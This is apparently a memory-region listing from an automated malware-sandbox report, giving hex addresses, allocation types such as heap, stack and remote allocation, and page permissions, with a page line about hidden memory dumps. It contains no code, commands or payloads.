unkown
page readonly
2D71000
heap
page read and write
2A20000
unkown
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2A77000
heap
page read and write
2D70000
heap
page read and write
89B8000
heap
page read and write
2203000
remote allocation
page execute and read and write
25F8000
stack
page read and write
2A84000
heap
page read and write
29C4000
heap
page read and write
33A0000
heap
page read and write
2D71000
heap
page read and write
1EC11C0A000
trusted library allocation
page read and write
2F90000
trusted library allocation
page execute and read and write
2D71000
heap
page read and write
3274000
trusted library allocation
page read and write
30B0000
heap
page read and write
33A1000
direct allocation
page execute and read and write
2D71000
heap
page read and write
2A4F000
heap
page read and write
2D71000
heap
page read and write
3526000
unkown
page read and write
2A7D000
heap
page read and write
29C4000
heap
page read and write
A57000
unkown
page readonly
2A55000
heap
page read and write
7AF0000
trusted library allocation
page read and write
2D71000
heap
page read and write
3E08000
unclassified section
page read and write
2D71000
heap
page read and write
6BE000
stack
page read and write
750000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
AC0000
unkown
page readonly
2FC0000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
EFC000
stack
page read and write
5EA000
unkown
page write copy
2E70000
trusted library allocation
page read and write
E92000
unkown
page read and write
2D71000
heap
page read and write
1EC100C2000
system
page execute and read and write
384A000
unkown
page read and write
2D71000
heap
page read and write
4C3E000
stack
page read and write
2D71000
heap
page read and write
7770000
trusted library allocation
page read and write
2F90000
heap
page read and write
1FE7D000
stack
page read and write
7CF000
stack
page read and write
2D71000
heap
page read and write
2A28000
heap
page read and write
2D71000
heap
page read and write
AE0000
unkown
page readonly
5F0000
unkown
page write copy
426000
unkown
page read and write
A40000
unkown
page readonly
C20000
heap
page read and write
29B0000
heap
page read and write
2D71000
heap
page read and write
3603000
remote allocation
page execute and read and write
571F000
stack
page read and write
C20000
heap
page read and write
2D71000
heap
page read and write
71E000
heap
page read and write
46FE000
heap
page read and write
1011000
unkown
page readonly
10002000
unkown
page readonly
BB0000
heap
page read and write
204C1000
heap
page read and write
2CB2000
heap
page read and write
990000
unkown
page readonly
33A7000
heap
page read and write
48B0000
direct allocation
page read and write
44A0000
heap
page read and write
7170000
direct allocation
page read and write
2A80000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
201B0000
direct allocation
page read and write
2D71000
heap
page read and write
A55000
unkown
page read and write
896F000
heap
page read and write
E8E000
unkown
page read and write
2D71000
heap
page read and write
76D000
heap
page read and write
39CE000
stack
page read and write
29F9000
heap
page read and write
1025000
heap
page read and write
71D0000
direct allocation
page read and write
1EC101F7000
heap
page read and write
8B20000
trusted library allocation
page execute and read and write
2A00000
unkown
page readonly
2D71000
heap
page read and write
2A0E000
heap
page read and write
2D71000
heap
page read and write
334E000
unkown
page read and write
883C000
stack
page read and write
2D71000
heap
page read and write
2F8F000
stack
page read and write
3412000
direct allocation
page execute and read and write
5C0000
unkown
page readonly
1000000
unkown
page read and write
2D71000
heap
page read and write
50D4000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
29CA000
heap
page read and write
4BD0000
trusted library allocation
page execute and read and write
2A28000
heap
page read and write
A10000
unkown
page read and write
4003000
remote allocation
page execute and read and write
204D0000
direct allocation
page execute and read and write
89C8000
heap
page read and write
2D71000
heap
page read and write
326E000
direct allocation
page execute and read and write
4540000
heap
page read and write
9443000
direct allocation
page execute and read and write
2D71000
heap
page read and write
2023E000
heap
page read and write
2006C000
stack
page read and write
2D71000
heap
page read and write
2A55000
heap
page read and write
116C000
system
page execute and read and write
403000
unkown
page write copy
51E000
stack
page read and write
B7E000
stack
page read and write
44E000
unkown
page readonly
4782000
heap
page read and write
A41000
unkown
page execute read
409000
unkown
page write copy
A41000
unkown
page execute read
1EC11DBE000
trusted library allocation
page read and write
4880000
direct allocation
page read and write
11CF000
system
page execute and read and write
1FE3C000
stack
page read and write
640000
heap
page read and write
4CD000
stack
page read and write
85E0000
heap
page read and write
2D71000
heap
page read and write
3394000
unkown
page read and write
20170000
direct allocation
page read and write
32A0000
trusted library allocation
page read and write
38CF000
stack
page read and write
2B80000
heap
page read and write
3378000
trusted library allocation
page read and write
7777000
trusted library allocation
page read and write
1EC11C21000
trusted library allocation
page read and write
92A0000
direct allocation
page execute and read and write
2D71000
heap
page read and write
32FD000
stack
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
90E000
stack
page read and write
970000
unkown
page readonly
2D71000
heap
page read and write
2780000
heap
page read and write
2066E000
direct allocation
page execute and read and write
227E000
stack
page read and write
A10000
unkown
page read and write
5B0000
unkown
page readonly
2D71000
heap
page read and write
DF7000
heap
page read and write
9EE000
stack
page read and write
84F000
stack
page read and write
44E000
unkown
page readonly
1EC101B0000
heap
page read and write
760E000
stack
page read and write
7C40000
heap
page read and write
8510000
heap
page read and write
452F000
stack
page read and write
2ACE000
stack
page read and write
2F4E000
stack
page read and write
20179000
heap
page read and write
98000
stack
page read and write
2A62000
heap
page read and write
70AE000
stack
page read and write
2D71000
heap
page read and write
5C0000
unkown
page readonly
7C70000
heap
page read and write
4782000
heap
page read and write
5E6000
unkown
page write copy
71000
heap
page read and write
2BE0000
unkown
page readonly
A40000
unkown
page readonly
4820000
direct allocation
page read and write
48D000
stack
page read and write
2D71000
heap
page read and write
201F1000
heap
page read and write
2D71000
heap
page read and write
1FFAE000
stack
page read and write
29C4000
heap
page read and write
308A000
heap
page read and write
B90000
unkown
page read and write
A41000
unkown
page execute read
2D71000
heap
page read and write
2D71000
heap
page read and write
1FF1E000
stack
page read and write
7D30000
trusted library allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
477D000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
46E0000
direct allocation
page read and write
630000
heap
page read and write
2A62000
heap
page read and write
28D4000
heap
page read and write
3240000
trusted library section
page read and write
7C31000
heap
page read and write
A01000
unkown
page readonly
2AD0000
heap
page read and write
48D0000
heap
page read and write
321E000
stack
page read and write
2D71000
heap
page read and write
421000
unkown
page read and write
4721000
heap
page read and write
27B0000
heap
page read and write
AE0000
unkown
page readonly
29A0000
unkown
page read and write
7C54000
heap
page read and write
78E0000
trusted library allocation
page read and write
1200000
unkown
page readonly
46D0000
direct allocation
page read and write
2D30000
heap
page read and write
2D71000
heap
page read and write
8690000
trusted library allocation
page read and write
7450000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
42E000
unkown
page read and write
27FA000
heap
page read and write
2D71000
heap
page read and write
4BCE000
stack
page read and write
8680000
trusted library allocation
page execute and read and write
2D71000
heap
page read and write
970000
unkown
page readonly
2D71000
heap
page read and write
1EC10220000
heap
page read and write
46A0000
direct allocation
page read and write
2280000
heap
page read and write
7670000
heap
page read and write
71A0000
direct allocation
page read and write
88FC000
stack
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
44A000
unkown
page readonly
2E8E000
unkown
page read and write
2A6C000
stack
page read and write
7C31000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2BDF000
stack
page read and write
1FFEF000
stack
page read and write
759000
heap
page read and write
44EE000
stack
page read and write
7B10000
trusted library allocation
page read and write
2D71000
heap
page read and write
4850000
direct allocation
page read and write
20450000
heap
page read and write
201B0000
direct allocation
page read and write
8978000
heap
page read and write
7C31000
heap
page read and write
BB0000
heap
page read and write
1EC10160000
heap
page read and write
2D71000
heap
page read and write
376F000
stack
page read and write
2D71000
heap
page read and write
8B30000
trusted library allocation
page read and write
4778000
heap
page read and write
2D71000
heap
page read and write
76DB000
heap
page read and write
447000
unkown
page read and write
8946000
heap
page read and write
649000
unkown
page write copy
7741000
heap
page read and write
3018000
heap
page read and write
2D71000
heap
page read and write
77B1000
heap
page read and write
2D71000
heap
page read and write
4788000
heap
page read and write
29B9000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2AD0000
heap
page read and write
980000
unkown
page readonly
2D71000
heap
page read and write
2D71000
heap
page read and write
1FF5F000
stack
page read and write
2D71000
heap
page read and write
EFC000
stack
page read and write
44E000
unkown
page readonly
10000000
unkown
page readonly
1150000
system
page execute and read and write
B80000
unkown
page readonly
A75C9FE000
stack
page read and write
205F9000
direct allocation
page execute and read and write
2021E000
heap
page read and write
3250000
trusted library section
page read and write
46B0000
direct allocation
page read and write
434000
unkown
page read and write
46FA000
heap
page read and write
93C000
stack
page read and write
2D71000
heap
page read and write
7A50000
trusted library allocation
page read and write
4778000
heap
page read and write
39E0000
unkown
page execute and read and write
2D71000
heap
page read and write
There are 898 hidden memdumps, click here to show them.